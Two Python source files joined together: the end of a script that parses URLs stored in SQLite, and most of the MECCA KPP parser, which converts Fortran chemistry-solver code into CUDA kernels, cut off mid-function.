################################################################################
# Main function
################################################################################
if __name__ == '__main__':
logging.info("[PROGRAM START]")
# logging.critical("%8s test message %s" % ("CRITICAL", str(datetime.utcnow())))
# logging.error("%8s test message %s" % ("ERROR", str(datetime.utcnow())))
# logging.warning("%8s test message %s" % ("WARNING", str(datetime.utcnow())))
# logging.info("%8s test message %s" % ("INFO", str(datetime.utcnow())))
# logging.debug("%8s test message %s" % ("DEBUG", str(datetime.utcnow())))
# Parameters check
if not os.path.exists(SQLITE_FILENAME):
logging.error("SQLITE does not exists at {0}".format(SQLITE_FILENAME))
exit()
create_parsed_url_table(SQLITE_FILENAME)
# Initial modules that requires it
# N/A
# Do work here
# ----------
# timestamp = datetime.utcnow()
# with sqlite3.connect(SQLITE_FILENAME) as conn:
# raw_url_cursor = conn.cursor()
# exec_cursor = conn.cursor()
# # res = cursor.execute(
# # "INSERT OR REPLACE INTO raw_url (timestamp, url, status) VALUES (?, ?, ?)",
# # (timestamp, url, status)
# # )
# # Fetch all at one go
# # cursor.execute("SELECT * FROM raw_url")
# # rec = cursor.fetchall()
# # Fetching one-by-one treating cursor as iterator
# for row in raw_url_cursor.execute("SELECT * FROM raw_url WHERE Status = 0"):
# print(row)
# # raw_url_cursor.execute("SELECT * FROM raw_url")
# # row = raw_url_cursor.fetchone()
# md5_hash = hashlib.md5(row[2]).hexdigest()
# parsed_res = urlparse(row[2])
# rowhex_count = 0
# exec_cursor.execute("SELECT * FROM parsed_url WHERE hexdigest = ?", (md5_hash,))
# rec = exec_cursor.fetchone()
# if rec is not None:
# rowhex_count = rec[7]
# rowhex_count = rowhex_count + 1
# res = exec_cursor.execute(
# "INSERT OR REPLACE INTO parsed_url (hexdigest, scheme, netloc, path, params, query, fragment, count, timestamp, status) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
# (md5_hash, parsed_res.scheme, parsed_res.netloc, parsed_res.path, parsed_res.params, parsed_res.query, parsed_res.fragment, rowhex_count, timestamp, 0)
# )
# res = exec_cursor.execute(
# "UPDATE raw_url SET status = 1 WHERE Id = ?",
# (row[0],)
# )
# normalize do work to function
process_raw_url(SQLITE_FILENAME)
logging.info("[PROGRAM END]")
|
#!/usr/bin/env python3
#########################################################################################################
#
# MECCA - KPP Fortran to CUDA parser
#
# Copyright 2016-2020 The Cyprus Institute
#
# Developers: Michail Alvanos - m.alvanos@cyi.ac.cy
# Theodoros Christoudias - christoudias@cyi.ac.cy
# Giannis Ashiotis
#
#########################################################################################################
import os
import shutil
import re
import subprocess, string
import argparse
smcl = "../../smcl/"
def remove_comments(source):
print("Removing comments...")
lines = source[:]
lines.reverse()
out = []
while True:
if lines == []:
break
line = lines.pop()
if "!" in line:
if line[0] == "!":
continue
line = line[:line.find("!")-1]+"\n"
line = line.strip()
if (line != ''):
out.append(line)
return out
def strip_and_unroll_lines(source):
lines = source[:]
lines.reverse()
out = []
while True:
if lines == []:
break
line = lines.pop()
line = line.strip()
if line != "":
if line[-1] == "&":
line = line[0:-1].strip() + " "
while True:
next_line = lines.pop()
next_line = next_line.strip()
if next_line!= "" and next_line[0] == "&":
next_line = " " + next_line[1:].strip()
if "&" in next_line:
line = line + next_line[:-1]
else:
line = line + next_line
break
line = line + "\n"
out.append(line)
return out
def find_subroutines(file_in, subroutine_names):
subroutines = {}
for subroutine in subroutine_names:
subroutine = subroutine.lower()
file_in.seek(0)
lines = file_in.readlines()
lines.reverse()
source = []
while True:
if lines == []:
break
line = lines.pop().lower()
if ( (("subroutine "+subroutine + " ") in line.lower()) or (("subroutine "+subroutine + "(") in line.lower()) ):
while True:
if lines == []:
break
line = lines.pop()
if ( ("subroutine "+subroutine) in line.lower()):
break
source.append(line)
break
subroutines[subroutine.strip()] = source
return subroutines
def decapitalize_vars(source,keys):
fixed=[]
for i in range(len(source)):
line = source[i]
for key in keys:
key = key.lower()
key_len = len(key)
if key in line.lower():
index = 0
while True:
index = line.lower().find(key, index)
if index == -1:
break
line = line[:index]+key+line[index+key_len:]
index = index + key_len
fixed.append(line)
return fixed
def fix_power_op(source):
operators = "*/+-<>=.,"
# can use this in the future:
#(\(?[0-9,a-z,A-Z,_,+,-,/,., ,)]+\)?)\*\*(\(?[-,\d,+,.,a-zA-Z_,/, ,\t]+\)?)
#
var_name = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_'
precision_qualifiers = ["_sp","_dp","_qp"]
fixed = []
for line in source:
if "**" in line:
index = len(line)
while True:
index = line.rfind("**",0, index-1)
if index == -1:
break
left = line[:index].strip()
right = line[index+2:].strip()
if right[0]=="(":
left_bra=0
right_bra = 0
pos = 0
for i in right:
if i == "(":
left_bra = left_bra + 1
elif i == ")":
right_bra = right_bra + 1
if left_bra == right_bra:
break
pos = pos + 1
exponent = right[1:pos]
right = right[pos+1:].strip()
else:
exponent = right
right = ""
if left[-1]==")": #if it's (...) or a3_(...)
left_bra=0
right_bra = 0
pos = 0
for i in reversed(left):
if i == "(":
left_bra = left_bra + 1
elif i == ")":
right_bra = right_bra + 1
if left_bra == right_bra:
break
pos = pos - 1
base = left[pos:-1].strip()
left = left[:pos-1].strip()
if left[-1] in var_name: #if it's a3_(...)
pos = 0
for i in reversed(left):
if i not in var_name:
break
pos = pos - 1
base = left[pos:].strip()+"("+base+")"
left = left[:pos].strip()
elif left[-3:].lower() in precision_qualifiers: # if it's 33._dp, 33.33E-33_dp or a_333_dp
if left[-4] == ".": # if it's 33._dp
pos=-4
for i in reversed(left[:-4]):
if i not in string.digits:
if pos == -4:
print("ERROR 1 in \"parser\" \n")
break
pos = pos -1
base = left[pos:-3]
left = left[:pos].strip()
elif left[-4] in var_name: # if it's 33.33E-33_dp or a_333_dp
pos=-3
scientif = False
isnumber = True
for i in reversed(left[:-3]):
if i not in string.digits+".":
if (i in "+-") and abs(pos-2)<=len(left) and (left[pos-2].lower() == "e"):
scientif = True
elif scientif and i.lower() == "e":
pass
                                elif i in string.ascii_letters+"_": # if it's a_333_dp
pos=-3
for i in reversed(left[:-3]):
if i not in var_name:
break
pos = pos - 1
isnumber = False
break
else:
break
pos = pos - 1
base = left[pos:-3]+((not isnumber) and (not scientif))*left[-3:]
left = left[:pos].strip()
else: # if it's 3. , 3.3E-33 or a_3
if left[-1] == ".": # if it's 33.
pos=-1
for i in reversed(left[:-1]):
if i not in string.digits:
if pos == -1:
print("ERROR 2 in \"parser\" \n")
break
pos = pos - 1
base = left[pos:]
left = left[:pos].strip()
elif left[-1] in var_name: # if it's 33.33E-33 or a_3
pos=0
scientif = False
isnumber = True
for i in reversed(left):
if i not in string.digits+".":
if (i in "+-") and abs(pos-2)<=len(left) and (left[pos-2].lower() == "e"):
scientif = True
elif scientif and i.lower() == "e":
pass
                                elif i in string.ascii_letters+"_": # if it's a_3
pos=0
for i in reversed(left):
if i not in var_name:
break
pos = pos - 1
isnumber = False
break
else:
break
pos = pos - 1
#base = left[pos:]+((not isnumber) and (not scientif))*left[:]
base = left[pos:]
left = left[:pos].strip()
else:
print("OOPS! Missed something...")
line = left+" pow("+base+", "+ exponent+") "+right+"\n"
fixed.append(line)
return fixed
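# Hedged illustration of the rewrite fix_power_op performs on Fortran power expressions
# (spacing in the output is approximate):
#
#   "k = a(3)**2.5_dp"   ->  "k =  pow(a(3), 2.5_dp) "
#   "x = (b+c)**(n-1)"   ->  "x =  pow(b+c, n-1) "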
def strip_lines(source):
stripped = []
for line in source:
stripped.append(line.strip())
return stripped
def split_beta(source,key):
the_line = 0
for line_num in range(len(source)):
if source[line_num].strip()[0:len(key)] == key:
the_line = line_num
break
main_body = []
for line_num in range(the_line,len(source)):
if "return" in source[line_num].lower():
source[line_num] = ""
main_body.append(source[line_num])
return main_body
def fix_indices(source,keys):
lines = source[:]
lines.reverse()
processed = []
while True:
if lines == []:
break
line = lines.pop()
for var in keys:
if var[0]+"(" in line:
index = 0
while True:
index = line.find(var[0]+"(", index)
if index == -1:
break
if len(var) == 2:
extra = ""
elif len(var) == 3:
extra = var[2]+","
else:
raise ValueError
if ((line[index+len(var[0])+1:line.find(")",index)]).strip().isdigit()):
line = line[:index]+var[1]+"(index,"+extra+str(int(line[index+len(var[0])+1:line.find(")",index)])-1)+line[line.find(")",index):].replace(")=",") =")
else:
print("Value error : "+ str(line[index+len(var[0])+1:line.find(")",index)]))
raise ValueError
index = index + len(var[1])+1
processed.append(line.strip())
return processed
pass
#########################################################################################################
#########################################################################################################
def split_rconst(source):
lines = source[:]
lines.reverse()
rconst_decls = []
rconst_ops = []
while True:
if lines == []:
break
line = lines.pop()
if line[0:6].lower() == "rconst":
rconst_ops.append(line)
elif ("=" in line) and (line.find("=") > 2):
rconst_decls.append(line)
return rconst_ops,rconst_decls
def rconst_preprocessor_1(source):
lines = source[:]
lines.reverse()
file_temp = open("file_temp.c","w")
file_temp.write("#define rconst(i) rconst(index,i)\n")
file_temp.write("#define jx(i,j) jx(index,j)\n")
file_temp.write("#define khet_st(i,j) khet_st(index,j)\n")
file_temp.write("#define khet_tr(i,j) khet_tr(index,j)\n")
file_temp.write("#define exp(i) exp(i)\n")
file_temp.write("#define C(i) var[i]\n")
file_temp.write("#define c(i) var[i]\n")
file_temp.write("#define REAL( i, SP) (i)\n")
file_temp.write("#define temp(i) temp_loc\n")
file_temp.write("#define cair(i) cair_loc\n")
file_temp.write("#define press(i) press_loc\n")
file_temp.write("#define log(i) log(i)\n")
while True:
if lines == []:
break
line = lines.pop()
if "rconst" in line:
index = 0
while True:
index = line.find("rconst(", index)
if index == -1:
break
line = line[:index+7]+str(int(line[index+7:line.find(")",index)])-1)+line[line.find(")",index):]
index = index + 7
file_temp.write(line)
file_temp.close()
file_temp = open("file_temp2.c","w")
p1 = subprocess.Popen(["gcc","-E","file_temp.c"], stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep","-v","\#"], stdin=p1.stdout, stdout=file_temp)
p2.wait()
file_temp.close()
file_temp = open("file_temp2.c","r")
file_temp.seek(0)
preprocessed = file_temp.readlines()
file_temp.close()
subprocess.call(["rm","-f","file_temp.c","file_temp2.c"])
return preprocessed
def get_rconst_locals(source):
rconst_locals=[]
for line in source:
if "=" in line:
if "IF" not in line:
rconst_locals.append(line.split("=",1)[0].strip())
return rconst_locals
def create_rconst_init(source):
rconst_init=[]
for line in source:
if "rconst" in line:
eline = line.replace("\n","\n")
eline = re.sub(r"rconst(\([0-9]+\))",r"rconst(index,\1-1)",eline)
rconst_init.append( eline )
return rconst_init
def generate_update_rconst(rconst_ops,rconst_decls,locals,rcint):
update_rconst = []
rename_tmp = False
# these are for renaming the rconst ops
for line in rconst_ops:
if ( "temp)" in line):
rename_tmp = True
break
if (rename_tmp == True):
rconst_ops = [w.replace('temp', 'temp_loc') for w in rconst_ops]
rconst_decls = [w.replace('temp', 'temp_loc') for w in rconst_decls]
rconst_ops = [w.replace('press', 'press_loc') for w in rconst_ops]
rconst_decls = [w.replace('press', 'press_loc') for w in rconst_decls]
rconst_ops = [w.replace('cair', 'cair_loc') for w in rconst_ops]
rconst_decls = [w.replace('cair', 'cair_loc') for w in rconst_decls]
update_rconst.append( \
"__device__ void update_rconst(const double * __restrict__ var, \n \
const double * __restrict__ khet_st, const double * __restrict__ khet_tr,\n \
const double * __restrict__ jx, double * __restrict__ rconst, \n\
const double * __restrict__ temp_gpu, \n\
const double * __restrict__ press_gpu, \n\
const double * __restrict__ cair_gpu, \n\
const int VL_GLO)\n")
update_rconst.append("{\n")
update_rconst.append(" int index = blockIdx.x*blockDim.x+threadIdx.x;\n\n")
update_rconst.append(" /* Set local buffer */\n")
update_rconst.append("\n")
update_rconst.append(" {\n")
update_rconst.append(" const double temp_loc = temp_gpu[index];\n")
update_rconst.append(" const double press_loc = press_gpu[index];\n")
update_rconst.append(" const double cair_loc = cair_gpu[index];\n")
update_rconst.append("\n")
line = " double"
for i in locals:
line = line+" "+i+","
line = line[:-1]+";\n"
update_rconst.append(line)
update_rconst.append("\n")
for line in rconst_decls:
line = re.sub(r"IF \(",r"if (",line)
update_rconst.append(" "+line.strip()+";\n")
update_rconst.append("\n")
for line in rconst_ops:
update_rconst.append(" "+line.strip()+";\n")
for line in rcint:
update_rconst.append(" "+line.strip()+";\n")
update_rconst.append(" }\n")
update_rconst.append("}\n")
return update_rconst
pass
#########################################################################################################
#########################################################################################################
def generate_kppsolve(source):
kppsolve=[]
kppsolve.append("__device__ void kppSolve(const double * __restrict__ Ghimj, double * __restrict__ K, \n\
const int istage, const int ros_S )")
kppsolve.append("{\n")
kppsolve.append(" int index = blockIdx.x*blockDim.x+threadIdx.x;\n")
kppsolve.append("\n")
kppsolve.append(" K = &K[istage*NVAR];\n")
kppsolve.append("\n")
for line in source:
line = line.strip()
if line != "":
line = re.sub(r"Ghimj\(index,([0-9]+)\)",r"Ghimj[\1]",line)
line = re.sub(r"K\(index,istage,([0-9]+)\)",r"K[\1]",line)
kppsolve.append(" "+line+";\n")
kppsolve.append("}\n")
return kppsolve
pass
#########################################################################################################
#########################################################################################################
def generate_kppDecomp(source,NSPEC,lu_diag,lu_crow,lu_icol):
kppDecomp = []
kppDecomp.append("__device__ void kppDecomp(double *Ghimj, int VL_GLO)\n")
kppDecomp.append("{\n")
kppDecomp.append(" double a=0.0;\n")
kppDecomp.append("\n")
kppDecomp.append(" double dummy")
for var in range(NSPEC):
kppDecomp.append(", W_" + str(var))
kppDecomp.append(";\n\n")
for line in source:
line = line.strip()
if line != "":
line = re.sub(r"Ghimj\(index,([0-9]+)\)",r"Ghimj[\1]",line)
line = re.sub(r"W\(index,([0-9]+)\)",r"W_\1",line)
kppDecomp.append(" "+line+";\n")
kppDecomp.append("}\n")
return kppDecomp
pass
#########################################################################################################
#########################################################################################################
def generate_kppDecompIndirect(source,NSPEC,lu_diag,lu_crow,lu_icol):
kppDecomp = []
kppDecomp.append("\n")
s_lu = "__device__ const int LU_DIAG[" + str(len(lu_diag)+1) + "] = { "
for i in range(len(lu_diag)):
s_lu = s_lu + str(lu_diag[i]) + ","
s_lu = s_lu + "0 };\n"
kppDecomp.append(s_lu)
s_lu = "__device__ const int LU_CROW[" + str(len(lu_crow)+1) + "] = { "
for i in range(len(lu_crow)):
s_lu = s_lu + str(lu_crow[i]) + ","
s_lu = s_lu + "0 };\n"
kppDecomp.append(s_lu)
s_lu = "__device__ const int LU_ICOL[" + str(len(lu_icol)+1) + "] = { "
for i in range(len(lu_icol)):
s_lu = s_lu + str(lu_icol[i]) + ","
s_lu = s_lu + "0 };\n"
kppDecomp.append(s_lu)
kppDecomp.append("\n")
kppDecomp.append("__device__ void kppDecomp(double *Ghimj, const int VL_GLO)\n")
kppDecomp.append("{\n")
kppDecomp.append(" double a=0.0;\n")
kppDecomp.append(" int k, kk, j, jj;\n")
kppDecomp.append(" double W[" + str(NSPEC) +"];\n")
kppDecomp.append("\n")
loop = "\n\
for (k=0;k<NVAR;k++){ \n\
for ( kk = LU_CROW[k]; kk< (LU_CROW[k+1]-1); kk++){ \n\
W[ LU_ICOL[kk] ]= Ghimj[kk];\n\
}\n\
for ( kk = LU_CROW[k]; kk < (LU_DIAG[k]- 1); k++){\n\
j = LU_ICOL[kk];\n\
a = - W[j] / Ghimj[ LU_DIAG[j]];\n\
W[j] = - a;\n\
for ( jj = LU_DIAG[j]+1; jj< (LU_CROW[j+ 1]- 1); jj++) {\n\
W[ LU_ICOL[jj] ] = W[ LU_ICOL[jj]]+ a*Ghimj[jj];\n\
}\n\
}\n\
for (kk = LU_CROW[k]; kk< (LU_CROW[k+ 1]- 1); kk++ ) {\n\
Ghimj[kk] = W[ LU_ICOL[kk]];\n\
}\n\
}\n"
kppDecomp.append(loop)
kppDecomp.append("}\n")
return kppDecomp
pass
#########################################################################################################
#########################################################################################################
def generate_jac_sp(source,NBSIZE):
jac_sp = []
jac_sp.append("__device__ void Jac_sp(const double * __restrict__ var, const double * __restrict__ fix,\n\
const double * __restrict__ rconst, double * __restrict__ jcb, int &Njac, const int VL_GLO)\n")
jac_sp.append("{\n")
jac_sp.append(" int index = blockIdx.x*blockDim.x+threadIdx.x;\n")
jac_sp.append("\n")
jac_sp.append(" double dummy")
for var in range(NBSIZE):
jac_sp.append(", B_" + str(var))
jac_sp.append(";\n\n")
jac_sp.append("\n")
jac_sp.append(" Njac++;\n")
jac_sp.append("\n")
for line in source:
line = line.strip()
if line != "":
line = re.sub(r"B\(index,([0-9]+)\)",r"B_\1",line)
line = re.sub(r"jcb\(index,([0-9]+)\)",r"jcb[\1]",line)
line = re.sub(r"var\(index,([0-9]+)\)",r"var[\1]",line)
line = re.sub(r"fix\(index,([0-9]+)\)",r"fix[\1]",line)
jac_sp.append(" "+line+";\n")
jac_sp.append(" }\n")
return jac_sp
pass
#########################################################################################################
#########################################################################################################
def generate_fun(source,NREACT):
fun = []
fun.append("__device__ void Fun(double *var, const double * __restrict__ fix, const double * __restrict__ rconst, double *varDot, int &Nfun, const int VL_GLO)")
fun.append("{\n")
fun.append(" int index = blockIdx.x*blockDim.x+threadIdx.x;\n")
fun.append("\n")
fun.append(" Nfun++;\n")
fun.append("\n")
fun.append(" double dummy")
for var in range(NREACT):
fun.append(", A_" + str(var))
fun.append(";\n\n")
fun.append(" {\n")
for line in source:
line = line.strip()
if line != "":
line = re.sub(r"A\(index,([0-9]+)\)",r"A_\1",line)
line = re.sub(r"var\(index,([0-9]+)\)",r"var[\1]",line)
line = re.sub(r"varDot\(index,([0-9]+)\)",r"varDot[\1]",line)
fun.append(" "+line+";\n")
fun.append(" }\n")
fun.append("}\n")
return fun
pass
#########################################################################################################
#########################################################################################################
def find_LU_DIAG(file_in, NVAR):
file_in.seek(0)
source = file_in.readlines()
the_line = 0
glu_diag = []
long_tables = False
for line_num in range(len(source)):
if "lu_diag_0" in source[line_num].lower():
print("Detected long tables!")
long_tables = True
the_line = line_num
break
for line_num in range(len(source)):
if (long_tables == True):
if "lu_diag " in source[line_num].lower():
end_line = line_num
else:
if "lu_diag" in source[line_num].lower():
the_line = line_num
break
lu_diag = []
if (long_tables == True):
for line_num in range(the_line,end_line):
lu_diag.append(source[line_num])
else:
for line_num in range(the_line,len(source)):
lu_diag.append(source[line_num])
if "/)" in source[line_num]:
break;
lu_diag = remove_comments(lu_diag)
lu_diag = strip_and_unroll_lines(lu_diag)
lu_diag = "".join(lu_diag)
lu_diag = lu_diag.lower()
lu_diag = lu_diag[lu_diag.find("(/")+2:lu_diag.rfind("/)")]
lu_diag = re.sub(r"\/\)\ninteger, parameter, dimension\([0-9]+\)?\s::?\slu_diag_[0-9]?\s=?\s\(/",r",",lu_diag)
    # if it fails, break it into smaller pieces
lu_diag = re.sub(r"dimension\([0-9]+\)::lu_diag_[0-9]\s?=\s?\(\/",r",",lu_diag)
lu_diag = re.sub(r"dimension\([0-9]+\)", r"",lu_diag)
lu_diag = re.sub(r"::", r"",lu_diag)
lu_diag = re.sub(r"lu_diag_[0-9]+\s?=\s?",r"",lu_diag)
lu_diag = re.sub(r"\(/",r"",lu_diag)
lu_diag = lu_diag.replace("/)\ninteger","")
lu_diag = lu_diag.replace("parameter,","")
lu_diag = lu_diag.replace(" ","")
lu_diag = lu_diag.split(",")
for line_num in range(len(lu_diag)):
lu_diag[line_num] = str(int(lu_diag[line_num])-1)
return lu_diag
def find_LU_CROW(file_in, NVAR):
file_in.seek(0)
source = file_in.readlines()
the_line = 0
glu_diag = []
long_tables = False
for line_num in range(len(source)):
if "lu_crow_0" in source[line_num].lower():
print("Detected long tables!")
long_tables = True
the_line = line_num
break
for line_num in range(len(source)):
if (long_tables == True):
if "lu_crow " in source[line_num].lower():
end_line = line_num
else:
if "lu_crow" in source[line_num].lower():
the_line = line_num
break
lu_diag = []
if (long_tables == True):
for line_num in range(the_line,end_line):
lu_diag.append(source[line_num])
else:
for line_num in range(the_line,len(source)):
lu_diag.append(source[line_num])
if "/)" in source[line_num]:
break;
lu_diag = remove_comments(lu_diag)
lu_diag = strip_and_unroll_lines(lu_diag)
lu_diag = "".join(lu_diag)
lu_diag = lu_diag.lower()
lu_diag = lu_diag[lu_diag.find("(/")+2:lu_diag.rfind("/)")]
lu_diag = re.sub(r"\/\)\ninteger, parameter, dimension\([0-9]+\)?\s::?\slu_crow_[0-9]?\s=?\s\(/",r",",lu_diag)
    # if it fails, break it into smaller pieces
lu_diag = re.sub(r"dimension\([0-9]+\)::lu_crow_[0-9]\s?=\s?\(\/",r",",lu_diag)
lu_diag = re.sub(r"dimension\([0-9]+\)", r"",lu_diag)
lu_diag = re.sub(r"::", r"",lu_diag)
lu_diag = re.sub(r"lu_crow_[0-9]\s?=\s?",r"",lu_diag)
lu_diag = re.sub(r"\(/",r"",lu_diag)
lu_diag = lu_diag.replace("/)\ninteger","")
lu_diag = lu_diag.replace("parameter,","")
lu_diag = lu_diag.replace(" ","")
lu_diag = lu_diag.split(",")
for line_num in range(len(lu_diag)):
lu_diag[line_num] = str(int(lu_diag[line_num])-1)
return lu_diag
def find_LU_ICOL(file_in, NVAR):
file_in.seek(0)
source = file_in.readlines()
the_line = 0
glu_diag = []
long_tables = False
for line_num in range(len(source)):
if "lu_icol_0" in source[line_num].lower():
print("Detected long tables!")
long_tables = True
the_line = line_num
break
for line_num in range(len(source)):
if (long_tables == True):
if "lu_icol " in source[line_num].lower():
end_line = line_num
else:
if "lu_icol" in source[line_num].lower():
the_line = line_num
break
lu_diag = []
if (long_tables == True):
for line_num in range(the_line,end_line):
lu_diag.append(source[line_num])
else:
for line_num in range(the_line,len(source)):
lu_diag.append(source[line_num])
if "/)" in source[line_num]:
break;
lu_diag = remove_comments(lu_diag)
lu_diag = strip_and_unroll_lines(lu_diag)
lu_diag = "".join(lu_diag)
lu_diag = lu_diag.lower()
lu_diag = lu_diag[lu_diag.find("(/")+2:lu_diag.rfind("/)")]
lu_diag = re.sub(r"\/\)\ninteger, parameter, dimension\([0-9]+\)?\s::?\slu_icol_[0-9]?\s=?\s\(/",r",",lu_diag)
    # if it fails, break it into smaller pieces
lu_diag = re.sub(r"dimension\([0-9]+\)::lu_icol_[0-9]\s?=\s?\(\/",r",",lu_diag)
lu_diag = re.sub(r"dimension\([0-9]+\)", r"",lu_diag)
lu_diag = re.sub(r"::", r"",lu_diag)
lu_diag = re.sub(r"lu_icol_[0-9]+\s?=\s?",r"",lu_diag)
lu_diag = re.sub(r"\(/",r"",lu_diag)
lu_diag = lu_diag.replace("/)\ninteger","")
lu_diag = lu_diag.replace("parameter,","")
lu_diag = lu_diag.replace(" ","")
lu_diag = lu_diag.split(",")
for line_num in range(len(lu_diag)):
lu_diag[line_num] = str(int(lu_diag[line_num])-1)
return lu_diag
#########################################################################################################
def generate_prepareMatrix(lu_diag):
prepareMatrix = []
prepareMatrix.append("__device__ void ros_PrepareMatrix(double &H, int direction, double gam, double *jac0, double *Ghimj, int &Nsng, int &Ndec, int VL_GLO)\n")
prepareMatrix.append("{\n")
prepareMatrix.append(" int index = blockIdx.x*blockDim.x+threadIdx.x;\n")
prepareMatrix.append(" int ising, nConsecutive;\n")
prepareMatrix.append(" double ghinv;\n")
prepareMatrix.append(" \n")
prepareMatrix.append(" ghinv = ONE/(direction*H*gam);\n")
prepareMatrix.append(" for (int i=0; i<LU_NONZERO; i++)\n")
prepareMatrix.append(" Ghimj[i] = -jac0[i];\n\n")
for i in lu_diag:
prepareMatrix.append(" Ghimj["+i+"] += ghinv;\n")
prepareMatrix.append(" ros_Decomp(Ghimj, Ndec, VL_GLO);\n")
prepareMatrix.append("}\n")
return prepareMatrix
pass
#########################################################################################################
def generate_special_ros(ros,inject_rconst):
if ( ros == '2'):
file_ros = open("./source/ros2.cu","r")
elif (ros == '3'):
file_ros = open("./source/ros3.cu","r")
elif (ros == '4'):
file_ros = open("./source/ros4.cu","r")
elif (ros == '5'):
file_ros = open("./source/rodas3.cu","r")
elif (ros == '6'):
file_ros = open("./source/rodas4.cu","r")
else:
return ''
rosfunc = []
source = file_ros.readlines()
for line in source:
if ( inject_rconst is True ):
line = line.replace("Jac_sp(var, fix, rconst, jac0, Njac, VL_GLO)","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Jac_sp(var, fix, rconst, jac0, Njac, VL_GLO)")
line = line.replace("Fun(varNew, fix, rconst, varNew, Nfun,VL_GLO);","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Fun(varNew, fix, rconst, varNew, Nfun,VL_GLO);")
line = line.replace("Fun(var, fix, rconst, Fcn0, Nfun, VL_GLO);","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Fun(var, fix, rconst, Fcn0, Nfun, VL_GLO);")
rosfunc.append(line)
return rosfunc
pass
#########################################################################################################
def generate_special_ros_caller(ros):
roscall = []
default_call = ' Rosenbrock<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
// values calculated from icntrl and rcntrl at host\n\
autonomous, vectorTol, UplimTol, method, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
// cuda global mem buffers \n\
d_absTol, d_relTol, \n\
d_khet_st, d_khet_tr, d_jx, \n\
// Global input arrays\n\
temp_gpu, press_gpu, cair_gpu, \n\
// extra - vector lenght and processor\n\
VL_GLO); '
if ( ros == '2'):
rosscall = ' switch (method){\n\
case 1:\n\
Rosenbrock_ros2<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
autonomous, vectorTol, UplimTol, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
d_absTol, d_relTol,\n\
d_khet_st, d_khet_tr, d_jx, \n\
temp_gpu, press_gpu, cair_gpu, \n\
VL_GLO);\n\
break;\n\
default: \n' + default_call + '\n\
\n\
break;\n\
}\n'
elif (ros == '3'):
rosscall = ' switch (method){\n\
case 2:\n\
Rosenbrock_ros3<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
autonomous, vectorTol, UplimTol, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
d_absTol, d_relTol,\n\
d_khet_st, d_khet_tr, d_jx, \n\
temp_gpu, press_gpu, cair_gpu, \n\
VL_GLO);\n\
break;\n\
default: \n' + default_call + '\n\
\n\
break;\n\
}\n'
elif (ros == '4'):
rosscall = ' switch (method){\n\
case 3:\n\
Rosenbrock_ros4<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
autonomous, vectorTol, UplimTol, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
d_absTol, d_relTol,\n\
d_khet_st, d_khet_tr, d_jx, \n\
temp_gpu, press_gpu, cair_gpu, \n\
VL_GLO);\n\
break;\n\
default: \n' + default_call + '\n\
\n\
break;\n\
}\n'
elif (ros == '5'):
rosscall = ' switch (method){\n\
case 4:\n\
Rosenbrock_rodas3<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
autonomous, vectorTol, UplimTol, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
d_absTol, d_relTol,\n\
d_khet_st, d_khet_tr, d_jx, \n\
temp_gpu, press_gpu, cair_gpu, \n\
VL_GLO);\n\
break;\n\
default: \n' + default_call + '\n\
\n\
break;\n\
}\n'
elif (ros == '6'):
rosscall = ' switch (method){\n\
case 5:\n\
Rosenbrock_rodas4<<<dimGrid,dimBlock>>>(d_conc, Tstart, Tend, d_rstatus, d_istatus,\n\
autonomous, vectorTol, UplimTol, Max_no_steps,\n\
d_jac0, d_Ghimj,d_varNew, d_K, d_varErr, d_dFdT, d_Fcn0, d_var, d_fix, d_rconst,\n\
Hmin, Hmax, Hstart, FacMin, FacMax, FacRej, FacSafe, roundoff,\n\
d_absTol, d_relTol,\n\
d_khet_st, d_khet_tr, d_jx, \n\
temp_gpu, press_gpu, cair_gpu, \n\
VL_GLO);\n\
break;\n\
default: \n' + default_call + '\n\
\n\
break;\n\
}\n'
else:
return default_call
return rosscall
pass
#########################################################################################################
#########################################################################################################
def generate_define_indices_one_line(file_in,prefix):
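    # Convert a single-line Fortran parameter list of "<prefix>_* = value"
    # indices into C "#define" lines, shifting the values to 0-based indexing.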
file_in.seek(0)
source = file_in.readlines()
source = remove_comments(source)
source = strip_and_unroll_lines(source)
the_line = 0
for line in source:
if prefix+"_" in line:
the_line = line
break
    the_line = the_line[the_line.find("::")+2:].replace("=","").replace("\n"," ")
    the_line = re.sub(r"\s+", " ", the_line)  # collapse whitespace so "name value" pairs split cleanly
the_line = the_line.split(",")
for i in range(len(the_line)):
if (len(the_line[i])<3):
continue;
# return;
the_line[i] = the_line[i].strip()
name, value = the_line[i].split(" ")
the_line[i] = "#define "+name+" "+str(int(value)-1)+"\n"
return the_line
def generate_define_indices_many_lines(file_in,prefix):
file_in.seek(0)
source = file_in.readlines()
source = remove_comments(source)
source = strip_and_unroll_lines(source)
the_line = 0
